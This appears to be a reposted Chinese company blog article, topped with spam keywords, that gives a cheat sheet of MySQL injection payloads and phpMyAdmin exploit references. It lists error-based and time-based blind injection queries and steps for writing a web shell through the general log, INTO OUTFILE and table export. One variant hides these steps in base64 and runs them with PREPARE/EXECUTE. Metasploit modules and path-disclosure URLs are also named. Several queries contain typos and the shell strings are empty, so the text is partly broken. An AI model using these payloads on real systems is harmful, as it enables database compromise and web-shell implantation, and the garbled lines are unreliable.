真实的国产乱ⅩXXX66竹夫人,五月香六月婷婷激情综合,亚洲日本VA一区二区三区,亚洲精品一区二区三区麻豆

成都創(chuàng)新互聯(lián)網(wǎng)站制作重慶分公司

SQL注入語(yǔ)法有哪些

這篇文章主要介紹了SQL注入語(yǔ)法有哪些,具有一定借鑒價(jià)值,感興趣的朋友可以參考下,希望大家閱讀完這篇文章之后大有收獲,下面讓小編帶著大家一起了解一下。

目前創(chuàng)新互聯(lián)建站已為近1000家的企業(yè)提供了網(wǎng)站建設(shè)、域名、虛擬主機(jī)、網(wǎng)站托管維護(hù)、企業(yè)網(wǎng)站設(shè)計(jì)、貴池網(wǎng)站維護(hù)等服務(wù),公司將堅(jiān)持客戶導(dǎo)向、應(yīng)用為本的策略,正道將秉承"和諧、參與、激情"的文化,與客戶和合作伙伴齊心協(xié)力一起成長(zhǎng),共同發(fā)展。

僅供參考學(xué)習(xí)使用。

SQL注入語(yǔ)法

報(bào)錯(cuò)注入

updatexml(1,concat(0x7e,(select database()),0x7e),1)--+

extractvalue(1,concat(0x7e,(select database()),0x7e),1)--+

select count(*) from information_schema.tabeles group by concat((select database(),floor(rand(0)*2)

select substr(version(),1,1)='X'

select substring(version(),1,1)='X'

列名重復(fù)報(bào)錯(cuò)

select * from (select name_const(version(),1))a;

select * from (select name_const((version()),1),name_const((select database()),1))a;

select * from (select * from users a join users b)c;

數(shù)據(jù)溢出報(bào)錯(cuò)

select (select(!x-~0) from (select(select user())x)a);

select ~0+!(select * from (select user())x);

幾何函數(shù)報(bào)錯(cuò)

multipoint((select * from(select * from(select user())a)b));

case when 語(yǔ)句

select * from datadatabase() case id when 1 else 2 end

時(shí)間注入

if right((select database()),a,b)>'s' sleep(5)

if assic(substr((select database()),a,b))=98 sleep(5)

if assic(substr((select database()) from a to b))=98 sleep(5)

if ord(mid((select database()),a,b))=98 sleep(5)
通過(guò)日志寫(xiě)shell
利用條件

已知物理路徑,目錄可寫(xiě),root權(quán)限。

查看配置

show variables like '%general';

開(kāi)啟general log模式

set global general_log=on;

設(shè)置日志寫(xiě)shell地址*

set global general_log_file="/var/www/html/log.php";

寫(xiě)入shell

select "";

通過(guò)into outfile寫(xiě)shell

利用條件

已知物理路徑,目錄可寫(xiě)

select '' into outfile ‘/var/www/html/1.php'

通過(guò)導(dǎo)出表寫(xiě)入shell

use MySQL;

create table shell(shell1 text not null);

insert into shell(cmd1) values('');

select cmd1 from a into outfile '/var/www/html/1.php';

mysql from_base64函數(shù)利用

利用base64編碼來(lái)加密,然后使用自定義變量接到,在使用prepare和EXECUTE來(lái)執(zhí)行語(yǔ)句,完成日志寫(xiě)shell的操作。

set

set 用戶定義一個(gè)變量,變量里面是sql可以執(zhí)行的語(yǔ)句。

SQL注入語(yǔ)法有哪些

prepare

prepare name from value;

prepare 語(yǔ)句用于預(yù)備一個(gè)語(yǔ)句,并指定名稱name,然后引用改語(yǔ)句。

SQL注入語(yǔ)法有哪些

execute

execute 語(yǔ)句用于執(zhí)行預(yù)備的語(yǔ)句。

SQL注入語(yǔ)法有哪些

聯(lián)合起來(lái)利用

set @sql1 = (select from_base64('c2V0IGdsb2JhbCBnZW5lcmFsX2xvZz1vbg=='));
/*set global general_log=on*/
PREPARE name from @sql;
EXECUTE name;
set @sql2= (select from_base64('c2V0IGdsb2JhbCBnZW5lcmFsX2xvZ19maWxlPSJDOlxcTVlPQVxcd2Vicm$9$vdFxcbG9naW4ucGhwIg=='));
/*set global general_log_file="C:\\MYOA\\webroot\\login.php"*/
PREPARE name from sql2;
EXECUTE name;
select "";
set @sql3 := (select from_base64('c2V0IGdsb2JhbCBnZW5lcmFsX2xvZyA9IG9mZg=='));
/*set global general_log = off*/
PREPARE name from @sql3;
EXECUTE name;

phpmyadmin 漏洞合集

phpmyadmin存在pregreplaceeval漏洞

影響版本:3.5.x < 3.5.8.1 and 4.0.0 < 4.0.0-rc3 CVE-2013-3238

phpmyadmin存在serversync.php后門漏洞

影響版本 phpmyadmin v3.5.2.2

msf利用模塊 : exploit/multi/http/phpmyadmin3522_backdoor CVE-2012-5159

phpmyadmin 配置文件/config/config.inc.php存在命令執(zhí)行漏洞

影響版本: 2.11.x < 2.11.9.5 and 3.x < 3.1.3.1

msf利用模塊:exploit/unix/webapp/phpmyadmin_config CVE-2009-1151

登錄處漏洞

利用方法:用戶名處寫(xiě)入'localhost'@'@"

影響版本:2.113/2.114

php爆絕對(duì)路徑

phpMyAdmin/libraries/selectlang.lib.php

phpMyAdmin/darkblueorange/layout.inc.php

phpMyAdmin/index.php?lang[]=1

phpmyadmin/themes/darkblue_orange/layout.inc.php

感謝你能夠認(rèn)真閱讀完這篇文章,希望小編分享的“SQL注入語(yǔ)法有哪些”這篇文章對(duì)大家有幫助,同時(shí)也希望大家多多支持創(chuàng)新互聯(lián),關(guān)注創(chuàng)新互聯(lián)行業(yè)資訊頻道,更多相關(guān)知識(shí)等著你來(lái)學(xué)習(xí)!


當(dāng)前題目:SQL注入語(yǔ)法有哪些
鏈接分享:http://weahome.cn/article/podjeh.html

其他資訊

在線咨詢

微信咨詢

電話咨詢

028-86922220(工作日)

18980820575(7×24)

提交需求

返回頂部